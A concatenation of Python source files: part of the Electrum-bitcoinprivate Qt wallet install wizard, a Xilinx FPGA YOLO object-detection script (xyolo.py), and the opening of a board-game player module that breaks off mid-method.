        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            # At the first step there is nothing to go back to: close instead.
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
        except UserCancelled:
            return
        # Normalize a single return value so it can be star-unpacked below.
        if not isinstance(out, tuple):
            out = (out,)
        run_next(*out)
    return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt install wizard guiding the user through opening/creating a wallet.

    Dialog pages are swapped into ``main_widget`` and a nested QEventLoop
    waits for a button press: 0 = rejected/cancel, 1 = back, 2 = next.
    """

    accept_signal = pyqtSignal()
    # Emitted from the background synchronization thread with a status message.
    synchronized_signal = pyqtSignal(str)

    def __init__(self, config, app, plugins, storage):
        BaseWizard.__init__(self, config, storage)
        QDialog.__init__(self, None)
        self.setWindowTitle('Electrum-bitcoinprivate - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        # Set for base class
        self.plugins = plugins
        self.language_for_seed = config.get('language')
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Nested event loop; exit codes: 0 = cancel, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon(':icons/electrum-bitcoinprivate.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX. Lame.

    def run_and_get_wallet(self, get_wallet_from_daemon):
        """Show the wallet-selection page and return an opened Wallet.

        Handles file choice, password / hardware-device decryption, account
        splitting, storage upgrades, and resuming incomplete wallet creation.
        Returns None if the user cancels.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(150)
        self.pw_e.setEchoMode(2)  # QLineEdit.Password
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum-bitcoinprivate wallet'))
        wallet_folder = os.path.dirname(self.storage.path)

        def on_choose():
            # Let the user browse for a wallet file.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)

        def on_filename(filename):
            # Re-evaluate self.storage and the info message whenever the
            # filename field changes.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.storage = wallet_from_memory.storage
                else:
                    self.storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                traceback.print_exc(file=sys.stderr)
                self.storage = None
                self.next_button.setEnabled(False)
            if self.storage:
                if not self.storage.file_exists():
                    msg =_("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                    pw = False
                elif not wallet_from_memory:
                    if self.storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        pw = True
                    elif self.storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                        pw = False
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                        pw = False
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                        + _("Press 'Next' to create/focus window.")
                    pw = False
            else:
                msg = _('Cannot read file')
                pw = False
            self.msg_label.setText(msg)
            # Only show the password field when a user password is needed.
            if pw:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()

        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.storage.path)
        self.name_e.setText(n)
        # Loop until we have a readable, decrypted storage (or the user bails).
        while True:
            if self.storage.file_exists() and not self.storage.is_encrypted():
                break
            if self.loop.exec_() != 2:  # 2 = next
                return
            if not self.storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.storage.path)
            if wallet_from_memory:
                return wallet_from_memory
            if self.storage.file_exists() and self.storage.is_encrypted():
                if self.storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        QMessageBox.information(None, _('Error'), str(e))
                        continue
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                elif self.storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
                    except InvalidPassword as e:
                        QMessageBox.information(
                            None, _('Error'),
                            _('Failed to decrypt using this hardware device.') + '\n' +
                            _('If you use a passphrase, make sure it is correct.'))
                        # Restart the wizard flow from scratch.
                        self.stack = []
                        return self.run_and_get_wallet(get_wallet_from_daemon)
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                    if self.storage.is_past_initial_decryption():
                        break
                    else:
                        return
                else:
                    raise Exception('Unexpected encryption version')

        path = self.storage.path
        if self.storage.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum-bitcoinprivate 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(self.storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return

        if self.storage.requires_upgrade():
            self.storage.upgrade()
            self.wallet = Wallet(self.storage)
            return self.wallet

        action = self.storage.get_action()
        if action and action != 'new':
            # Wallet creation was interrupted previously; offer to resume.
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
        if action:
            # self.wallet is set in run
            self.run(action)
            return self.wallet

        self.wallet = Wallet(self.storage)
        return self.wallet

    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return

    def on_error(self, exc_info):
        """Show unexpected exceptions to the user (UserCancelled is silent)."""
        if not isinstance(exc_info[1], UserCancelled):
            traceback.print_exception(*exc_info)
            self.show_error(str(exc_info[1]))

    def set_icon(self, filename):
        """Set the sidebar logo; returns the previously shown icon path."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(filename)
                            .scaledToWidth(64, Qt.SmoothTransformation))
        return prior_filename

    def set_layout(self, layout, title=None, next_enabled=True):
        """Install a new page layout into the wizard's main widget."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)

    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True):
        """Show a page and block in a nested event loop until a button press.

        Raises UserCancelled on cancel (if ``raise_on_cancel``) and GoBack
        on the Back button; otherwise returns the loop's exit code.
        """
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack from None
        # Switch to the "please wait" state until the next page is set.
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result

    def refresh_gui(self):
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()

    def remove_from_recently_open(self, filename):
        """Drop ``filename`` from the recently-opened wallets list."""
        self.config.remove_from_recently_open(filename)

    def text_input(self, title, message, is_valid, allow_multi=False):
        """Show a free-form key entry page and return the entered text."""
        slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
                             allow_multi=allow_multi)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()

    def seed_input(self, title, message, is_seed, options):
        """Show a seed entry page; returns (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext

    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
        """Ask for a master public key (xpub)."""
        return self.text_input(title, message, is_valid, allow_multi)

    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        """Ask for cosigner number ``index``'s xpub (or xprv)."""
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        """Ask for a seed phrase when restoring a wallet."""
        options = []
        if self.opt_ext:
            options.append('ext')
        if self.opt_bip39:
            options.append('bip39')
        title = _('Enter Seed')
        message = _('Please enter your seed phrase in order to restore your wallet.')
        return self.seed_input(title, message, test, options)

    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        """Make the user retype the freshly generated seed."""
        # Clear the clipboard so the seed cannot simply be pasted back.
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed

    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        """Display the generated seed; returns whether 'extend' was chosen."""
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext

    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Run a password entry page; returns (new_password, encrypt_file)."""
        playout = PasswordLayout(None, msg, kind, self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()

    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it. Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)

    @wizard_dialog
    def request_storage_encryption(self, run_next):
        """Ask whether the wallet file should be encrypted (hardware wallets)."""
        playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()

    def show_restore(self, wallet, network):
        # FIXME: these messages are shown after the install wizard is
        # finished and the window closed. On macOS they appear parented
        # with a re-appeared ghost install wizard window...
        if network:
            def task():
                # Runs on a daemon thread; result is delivered via signal.
                wallet.wait_until_synchronized()
                if wallet.is_found():
                    msg = _("Recovery successful")
                else:
                    msg = _("No transactions found for this seed")
                self.synchronized_signal.emit(msg)
            self.synchronized_signal.connect(self.show_message)
            t = threading.Thread(target = task)
            t.daemon = True
            t.start()
        else:
            msg = _("This wallet was restored offline. It may "
                    "contain more addresses than displayed.")
            self.show_message(msg)

    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        """Show a confirmation page (Next to proceed)."""
        self.confirm(message, title)

    def confirm(self, message, title):
        """Display ``message`` and wait for the user to press Next."""
        label = WWLabel(message)
        vbox = QVBoxLayout()
        vbox.addWidget(label)
        self.exec_layout(vbox, title)

    @wizard_dialog
    def action_dialog(self, action, run_next):
        """Run a named BaseWizard action as a wizard step."""
        self.run(action)

    def terminate(self):
        """Request the wizard to accept/close (thread-safe via signal)."""
        self.accept_signal.emit()

    def waiting_dialog(self, task, msg):
        """Show ``msg`` while running ``task`` on a worker thread.

        NOTE(review): joins the thread immediately, so this blocks the
        calling thread for the task's duration.
        """
        self.please_wait.setText(msg)
        self.refresh_gui()
        t = threading.Thread(target = task)
        t.start()
        t.join()

    @wizard_dialog
    def choice_dialog(self, title, message, choices, run_next):
        """Present (value, label) choices; returns the selected value."""
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        clayout = ChoicesLayout(message, c_titles)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, title)
        action = c_values[clayout.selected_index()]
        return action

    def query_choice(self, msg, choices):
        """called by hardware wallets"""
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout()
        vbox.addLayout(clayout.layout())
        self.exec_layout(vbox, '')
        return clayout.selected_index()

    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=()):
        """Single-line input validated by ``test``; returns the trimmed text."""
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)
        def f(text):
            # Enable Next only while the input passes validation.
            self.next_button.setEnabled(test(text))
        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        for preset in presets:
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
            button.setMaximumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, Qt.AlignCenter)
            vbox.addLayout(hbox)
        self.exec_layout(vbox, title, next_enabled=test(default))
        # Collapse any run of whitespace to single spaces.
        return ' '.join(line.text().split())

    @wizard_dialog
    def show_xpub_dialog(self, xpub, run_next):
        """Display the wallet's master public key for sharing with cosigners."""
        msg = ' '.join([
            _("Here is your master public key."),
            _("Please share it with your cosigners.")
        ])
        vbox = QVBoxLayout()
        layout = SeedLayout(xpub, title=msg, icon=False)
        vbox.addLayout(layout.layout())
        self.exec_layout(vbox, _('Master Public Key'))
        return None

    def init_network(self, network):
        """Ask how to connect to a server (auto vs manual selection)."""
        message = _("Electrum-bitcoinprivate communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum-bitcoinprivate "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)

    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Let the user pick m-of-n multisig parameters; returns (m, n)."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            # m can never exceed the number of cosigners.
            m_edit.setMaximum(n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
xyolo.py | #!/usr/bin/env python
#
# // SPDX-License-Identifier: BSD-3-CLAUSE
#
# (C) Copyright 2018, Xilinx, Inc.
#
import os,sys,timeit,json
from multiprocessing import Process, Queue
# To control print verbosity
import logging as log
# Bring in some utility functions from local file
from yolo_utils import cornersToxywh,sigmoid,softmax,generate_colors,draw_boxes
import numpy as np
# Bring in a C implementation of non-max suppression
sys.path.append('nms')
import nms
# Bring in Xilinx Caffe Compiler, and Quantizer
# We directly compile the entire graph to minimize data movement between host, and card
from xfdnn.tools.compile.bin.xfdnn_compiler_caffe import CaffeFrontend as xfdnnCompiler
from xfdnn.tools.quantize.quantize import CaffeFrontend as xfdnnQuantizer
# Bring in Xilinx XDNN middleware
from xfdnn.rt import xdnn
from xfdnn.rt import xdnn_io
class xyolo():
    """YOLO object detection pipeline running on a Xilinx FPGA (XDNN).

    Work is split into two stages connected by queues: an FPGA stage
    (image load + network execution) and a bbox stage (activations, NMS,
    reporting). Unless ``single_proc_mode`` is set on the instance, each
    stage runs in its own multiprocessing.Process.
    """

    def __init__(self,batch_sz=10,in_shape=[3,608,608],quantizecfg="yolo_deploy_608.json",xclbin=None,
                 netcfg="yolo.cmds",datadir="yolov2.caffemodel_data",labels="coco.names",xlnxlib="libxfdnn.so",firstfpgalayer="conv0",classes=80,verbose=False):
        if verbose:
            log.basicConfig(format="%(levelname)s: %(message)s",level=log.DEBUG)
            log.info("Running with verbose output")
        else:
            log.basicConfig(format="%(levelname)s: %(message)s")
        # An FPGA bitstream is mandatory; fail fast if it is missing.
        if xclbin is None:
            log.error("XYOLO initialized without reference to xclbin, please set this before calling detect!!")
            sys.exit(1)
        self.xdnn_handle = None
        # Class names, one per line, e.g. COCO labels.
        log.info("Reading labels...")
        with open(labels) as f:
            names = f.readlines()
        self.names = [x.strip() for x in names]
        # Arguments exposed to user
        self.in_shape = in_shape
        self.quantizecfg = quantizecfg
        self.xclbin = xclbin
        self.netcfg = netcfg
        self.datadir = datadir
        self.labels = labels
        self.xlnxlib = xlnxlib
        self.batch_sz = batch_sz
        self.firstfpgalayer = firstfpgalayer # User may be using their own prototxt w/ unique names
        self.classes = classes # User may be using their own prototxt with different region layer
        # Arguments not exposed to user
        ## COCO categories are not sequential
        self.img_raw_scale = "255.0"
        self.img_input_scale = "1.0"
        # Maps a 0-based class index to the official COCO category id.
        self.cats = [1,2,3,4,5,6,7,8,9,10,11,
                     13,14,15,16,17,18,19,20,21,22,23,24,25,
                     27,28,
                     31,32,33,34,35,36,37,38,39,40,41,42,43,44,
                     46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,
                     67,
                     70,
                     72,73,74,75,76,77,78,79,80,81,82,
                     84,85,86,87,88,89,90]
        self.images = None
        self.scaleA = 10000
        self.scaleB = 30
        self.PE = -1
        self.transform = "yolo" # XDNN_IO will scale/letterbox the image for YOLO network
        self.img_mean = "0,0,0"
        self.net_w = self.in_shape[1]
        self.net_h = self.in_shape[2]
        import math
        # YOLO downsamples by a factor of 32 from input to output grid.
        self.out_w = int(math.ceil(self.net_w / 32.0))
        self.out_h = int(math.ceil(self.net_h / 32.0))
        self.bboxplanes = 5  # anchor boxes per grid cell
        #self.classes = 80
        self.scorethresh = 0.24
        self.iouthresh = 0.3
        self.groups = self.out_w*self.out_h
        self.coords = 4
        self.groupstride = 1
        self.batchstride = (self.groups)*(self.classes+self.coords+1)
        self.beginoffset = (self.coords+1)*(self.out_w*self.out_h)
        self.outsize = (self.out_w*self.out_h*(self.bboxplanes+self.classes))*self.bboxplanes
        self.colors = generate_colors(self.classes) # Generate color pallette for drawing boxes
        # vars(self) is a live view of the instance dict; the stage
        # processes receive it as their configuration.
        config = vars(self)
        self.q_fpga = Queue(maxsize=1)
        self.q_bbox = Queue(maxsize=1)
        if "single_proc_mode" in config:
            # Stages will be run inline from detect() instead.
            self.proc_fpga = None
            self.proc_bbox = None
        else:
            self.proc_fpga = Process(target=self.fpga_stage, args=(config, self.q_fpga, self.q_bbox))
            self.proc_bbox = Process(target=self.bbox_stage, args=(config, self.q_bbox))
            self.proc_fpga.start()
            self.proc_bbox.start()
        log.info("Running network input %dx%d and output %dx%d"%(self.net_w,self.net_h,self.out_w,self.out_h))

    def __enter__(self):
        """Context-manager entry; returns self."""
        log.info("Entering XYOLO WITH")
        return self

    def __exit__(self,*a):
        """Stop worker processes and release the FPGA handle on exit."""
        self.stop()
        if self.xdnn_handle:
            xdnn.closeHandle()

    @staticmethod
    def fpga_stage(config, q_fpga, q_bbox, maxNumIters=-1):
        """Worker loop: pull jobs from q_fpga, run the FPGA, push to q_bbox.

        A ``None`` job is the shutdown signal and is propagated downstream.
        ``maxNumIters`` > 0 limits iterations (used for single-proc mode).
        """
        # NOTE(review): treats a non-zero return as failure — confirm
        # createHandle's return convention against the XDNN API.
        config['xdnn_handle'], handles = xdnn.createHandle(config['xclbin'], "kernelSxdnn_0")
        if config['xdnn_handle'] != 0:
            log.error("Failed to start FPGA process ",
                      " - could not open xclbin %s %s!" \
                      % (config['xclbin'], config['xlnxlib']))
            sys.exit(1)
        fpgaRT = xdnn.XDNNFPGAOp(handles, config)
        # Allocate FPGA Outputs
        fpgaOutSize = config['out_w']*config['out_h']*config['bboxplanes']*(config['classes']+config['coords']+1)
        fpgaOutput = np.empty((config['batch_sz'], fpgaOutSize,), dtype=np.float32, order='C')
        raw_img = np.empty(((config['batch_sz'],) + config['in_shape']), dtype=np.float32, order='C')
        numIters = 0
        while True:
            numIters += 1
            if maxNumIters > 0 and numIters > maxNumIters:
                break
            job = q_fpga.get()
            if job == None:
                q_bbox.put(None) # propagate 'stop' signal downstream
                sys.exit(0)
            images = job['images']
            display = job['display']
            coco = job['coco']
            if images is not None:
                log.info("Running Image(s):")
                log.info(images)
                config['images'] = images
            else:
                log.error("Detect requires images as a parameter")
                continue
            # Letterbox/scale each image into the pre-allocated input buffer.
            log.info("Preparing Input...")
            shapes = []
            for i,img in enumerate(images):
                raw_img[i,...], s = xdnn_io.loadYoloImageBlobFromFile(img, config['in_shape'][1], config['in_shape'][2])
                shapes.append(s)
            job['shapes'] = shapes # pass shapes to next stage
            # EXECUTE XDNN
            log.info("Running %s image(s)"%(config['batch_sz']))
            startTime = timeit.default_timer()
            fpgaRT.execute(raw_img, fpgaOutput, config['PE'])
            elapsedTime = timeit.default_timer() - startTime
            # Only showing time for second run because first is loading script
            log.info("\nTotal FPGA: %f ms" % (elapsedTime*1000))
            log.info("Image Time: (%f ms/img):" % (elapsedTime*1000/config['batch_sz']))
            q_bbox.put((job, fpgaOutput))

    @staticmethod
    def bbox_stage(config, q_bbox, maxNumIters=-1):
        """Worker loop: apply activations + NMS to FPGA output, report boxes.

        Accumulates all detections and writes them to results.json on exit.
        A ``None`` payload is the shutdown signal.
        """
        results = []
        numIters = 0
        while True:
            numIters += 1
            if maxNumIters > 0 and numIters > maxNumIters:
                break
            payload = q_bbox.get()
            if payload == None:
                break
            (job, fpgaOutput) = payload
            fpgaOutput = fpgaOutput.flatten()
            images = job['images']
            display = job['display']
            coco = job['coco']
            for i in range(config['batch_sz']):
                log.info("Results for image %d: %s"%(i, images[i]))
                startidx = i*config['outsize']
                softmaxout = fpgaOutput[startidx:startidx+config['outsize']]
                # first activate first two channels of each bbox subgroup (n)
                for b in range(config['bboxplanes']):
                    for r in range(config['batchstride']*b, config['batchstride']*b+2*config['groups']):
                        softmaxout[r] = sigmoid(softmaxout[r])
                    for r in range(config['batchstride']*b+config['groups']*config['coords'], config['batchstride']*b+config['groups']*config['coords']+config['groups']):
                        softmaxout[r] = sigmoid(softmaxout[r])
                # Now softmax on all classification arrays in image
                for b in range(config['bboxplanes']):
                    for g in range(config['groups']):
                        softmax(config['beginoffset'] + b*config['batchstride'] + g*config['groupstride'], softmaxout, softmaxout, config['classes'], config['groups'])
                # NMS
                bboxes = nms.do_baseline_nms(softmaxout, job['shapes'][i][1], job['shapes'][i][0], config['net_w'], config['net_h'], config['out_w'], config['out_h'], config['bboxplanes'], config['classes'], config['scorethresh'], config['iouthresh'])
                # REPORT BOXES
                log.info("Found %d boxes"%(len(bboxes)))
                for j in range(len(bboxes)):
                    log.info("Obj %d: %s" % (j, config['names'][bboxes[j]['classid']]))
                    log.info("\t score = %f" % (bboxes[j]['prob']))
                    log.info("\t (xlo,ylo) = (%d,%d)" % (bboxes[j]['ll']['x'], bboxes[j]['ll']['y']))
                    log.info("\t (xhi,yhi) = (%d,%d)" % (bboxes[j]['ur']['x'], bboxes[j]['ur']['y']))
                    filename = images[i]
                    if coco:
                        # COCO filenames encode the numeric image id after the
                        # last underscore.
                        image_id = int(((filename.split("/")[-1]).split("_")[-1]).split(".")[0])
                    else:
                        image_id = filename.split("/")[-1]
                    x,y,w,h = cornersToxywh(bboxes[j]["ll"]["x"],bboxes[j]["ll"]["y"],bboxes[j]['ur']['x'],bboxes[j]['ur']['y'])
                    result = {"image_id":image_id,"category_id": config['cats'][bboxes[j]["classid"]],"bbox":[x,y,w,h],"score":round(bboxes[j]['prob'],3)}
                    results.append(result)
                # DRAW BOXES w/ LABELS
                if display:
                    draw_boxes(images[i],bboxes,config['names'],config['colors'])
        log.info("Saving results as results.json")
        with open("results.json","w") as fp:
            fp.write(json.dumps(results, sort_keys=True, indent=4))

    def detect(self,images=None,display=False,coco=False):
        """Queue a batch of image paths for detection.

        In single-proc mode the two stages are executed inline for one
        iteration; otherwise the background processes pick up the job.
        """
        self.q_fpga.put({
            'images': images,
            'display': display,
            'coco': coco
        })
        config = vars(self)
        if not self.proc_fpga:
            # single proc mode, no background procs, execute explicitly
            self.fpga_stage(config, self.q_fpga, self.q_bbox, 1)
            self.bbox_stage(config, self.q_bbox, 1)

    def stop(self):
        """Signal the FPGA stage to shut down and join both worker processes."""
        if not self.proc_fpga:
            return
        self.q_fpga.put(None)
        self.proc_fpga.join()
        self.proc_bbox.join()
        self.proc_fpga = None
        self.proc_bbox = None
if __name__ == '__main__':
    config = xdnn_io.processCommandLine()
    # Define the xyolo instance; the context manager guarantees worker
    # shutdown and FPGA handle release on exit.
    # NOTE(review): eval() on a command-line string is unsafe for untrusted
    # input — ast.literal_eval would be safer; confirm input is trusted.
    with xyolo(batch_sz=len(config["images"]),in_shape=eval(config["in_shape"]),quantizecfg=config["quantizecfg"],xclbin=config["xclbin"],verbose=True) as detector:
        detector.detect(config["images"])
        detector.stop()
|
player.py | # -*- coding: UTF-8 -*-
import threading, time
from .model import *
class Player:
    """Base class for a game participant identified by a color and a name.

    Subclasses override the public hooks ``start_new_game`` and
    ``game_is_over``; the game engine calls the underscored wrappers.
    """

    def __init__(self, color, name):
        self._color = color
        self._name = name
        self._score = 0

    @property
    def color(self):
        """The player's piece color."""
        return self._color

    @property
    def name(self):
        """The player's display name."""
        return self._name

    @property
    def score(self):
        """The player's current score."""
        return self._score

    def _start_new_game(self):
        # Reset the score before notifying the subclass hook.
        self._score = 0
        self.start_new_game()

    def _game_is_over(self, is_win):
        # Forward the final result to the subclass hook.
        self.game_is_over(is_win)

    def start_new_game(self):
        """Hook: called when a new game begins. Default: do nothing."""
        pass

    def game_is_over(self, is_win):
        """Hook: called when the game ends. Default: do nothing."""
        pass
class HumanPlayer(Player):
    """A player whose moves are supplied through the user interface."""

    def __init__(self, color, name, game_controller):
        super().__init__(color, name)
        self.__game_controller = game_controller

    def move(self, coordinate):
        """Place a piece of this player's color at ``coordinate``."""
        piece = Piece(self.color, coordinate)
        self.__game_controller.move(piece)
class AIPlayer(Player):
    """Computer-controlled player that computes its move on a worker thread."""

    def __init__(self, color, name, game_controller):
        super().__init__(color, name)
        self.__game_controller = game_controller
        self._board = None
        self._history = None
        self._last_piece = None
        self.__thread = None

    def last_move(self, piece, board, history, next_player_color):
        """Record the latest move; if it is now our turn, start thinking."""
